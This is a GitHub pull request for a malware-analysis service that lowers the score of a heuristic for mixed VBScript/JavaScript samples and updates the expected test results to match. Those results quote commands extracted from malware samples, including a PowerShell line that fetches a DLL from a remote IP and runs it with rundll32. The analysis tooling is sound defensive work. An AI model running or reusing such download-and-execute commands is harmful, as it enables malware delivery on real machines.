Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Use post-process actions to resubmit to dynamic, not a high score #575

Merged
merged 1 commit into from
Aug 16, 2023
Merged

Use post-process actions to resubmit to dynamic, not a high score #575

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
1 change: 1 addition & 0 deletions jsjaws.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -2024,6 +2024,7 @@ def _is_vb_and_js_scripts(self, scripts: ResultSet[PageElement], request: Servic
if vb_and_js_scripts:
heur = Heuristic(12)
vb_and_js_section = ResultTextSection(heur.name, heuristic=heur, parent=request.result, body=heur.description)
vb_and_js_section.add_tag("file.behavior", heur.name)

# We want to extract all VBScripts IFF there are both JavaScript and VBScript scripts in the file
for script in scripts:
Expand Down
2 changes: 1 addition & 1 deletion service_manifest.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -194,7 +194,7 @@ heuristics:

- heur_id: 12
name: Visual Basic and JavaScript
score: 500
score: 1
filetype: '.*'
description: Sample uses a combination of both Visual Basic and JavaScript

Expand Down
19 changes: 16 additions & 3 deletions tests/results/3eadb018d45336f73e6c0f620de84057eb2ffb214f0deb699434aaa01e64a28d/result.json
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 1632,
"score": 1133,
"sections": [
{
"auto_collapse": false,
Expand All @@ -11,7 +11,13 @@
"classification": "TLP:C",
"depth": 0,
"heuristic": null,
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand All @@ -31,7 +37,7 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {
"suspicious_url_found": 1
Expand Down Expand Up @@ -410,6 +416,13 @@
"value": "taskkill /f /im mshta.exe"
}
],
"file.behavior": [
{
"heur_id": null,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
],
"file.string.extracted": [
{
"heur_id": 2,
Expand Down
19 changes: 16 additions & 3 deletions tests/results/6780a74641680b48e143386740bfb8cf380466a75a6c2a09478c8e26dc04ee13/result.json
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 1402,
"score": 903,
"sections": [
{
"auto_collapse": false,
Expand Down Expand Up @@ -33,11 +33,17 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {}
},
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand Down Expand Up @@ -405,6 +411,13 @@
"value": "cmd.exe cmd /c start /min powershell IWR -uri http://165.22.160.25/w9edb/160223 -o %temp%\\adeP1F.dll;start-process rundll32 %temp%\\adeP1F.dll N115"
}
],
"file.behavior": [
{
"heur_id": 12,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
],
"file.string.extracted": [
{
"heur_id": 2,
Expand Down
19 changes: 16 additions & 3 deletions tests/results/7ed2a67febed6703359258ad597946bd5c07bc4b1313f32b1d82281d09810f9f/result.json
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 871,
"score": 372,
"sections": [
{
"auto_collapse": false,
Expand All @@ -14,11 +14,17 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {}
},
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand Down Expand Up @@ -229,6 +235,13 @@
"signatures": [],
"value": "flasks/data.txt"
}
],
"file.behavior": [
{
"heur_id": 12,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
]
},
"temp_submission_data": {}
Expand Down
22 changes: 18 additions & 4 deletions tests/results/a8b6bac764f3178d130f50949c19f37c5310b23cdc0cba66569e047b732844c4/result.json
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 750,
"score": 251,
"sections": [
{
"auto_collapse": false,
Expand All @@ -14,11 +14,17 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {}
},
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand Down Expand Up @@ -74,7 +80,15 @@
]
}
],
"tags": {},
"tags": {
"file.behavior": [
{
"heur_id": 12,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
]
},
"temp_submission_data": {}
}
}
19 changes: 16 additions & 3 deletions tests/results/b86808fa91902548e429018297f01d9ae76b319fb192fc095e8d40e6aaed71c4/result.json
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 1632,
"score": 1133,
"sections": [
{
"auto_collapse": false,
Expand All @@ -11,7 +11,13 @@
"classification": "TLP:C",
"depth": 0,
"heuristic": null,
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand All @@ -31,7 +37,7 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {
"suspicious_url_found": 1
Expand Down Expand Up @@ -404,6 +410,13 @@
"value": "rundll32 C:\\ProgramData\\index1.png,Wind "
}
],
"file.behavior": [
{
"heur_id": null,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
],
"file.string.extracted": [
{
"heur_id": 2,
Expand Down
19 changes: 16 additions & 3 deletions tests/results/f0a00d22892a3885f4c041e919ee872a3da5d84fe04700e1c3507f22af70ab3d/result.json
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 1632,
"score": 1133,
"sections": [
{
"auto_collapse": false,
Expand All @@ -11,7 +11,13 @@
"classification": "TLP:C",
"depth": 0,
"heuristic": null,
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand All @@ -31,7 +37,7 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {
"suspicious_url_found": 1
Expand Down Expand Up @@ -404,6 +410,13 @@
"value": "rundll32 C:\\ProgramData\\121.png,Wind "
}
],
"file.behavior": [
{
"heur_id": null,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
],
"file.string.extracted": [
{
"heur_id": 2,
Expand Down
19 changes: 16 additions & 3 deletions tests/results/f1b65c29b1d37c4360e92d429613d9b7f3a17bbf34cee8032a5df597685bb358/result.json
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 1632,
"score": 1133,
"sections": [
{
"auto_collapse": false,
Expand All @@ -11,7 +11,13 @@
"classification": "TLP:C",
"depth": 0,
"heuristic": null,
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand All @@ -31,7 +37,7 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {
"suspicious_url_found": 1
Expand Down Expand Up @@ -410,6 +416,13 @@
"value": "taskkill /f /im mshta.exe"
}
],
"file.behavior": [
{
"heur_id": null,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
],
"file.string.extracted": [
{
"heur_id": 2,
Expand Down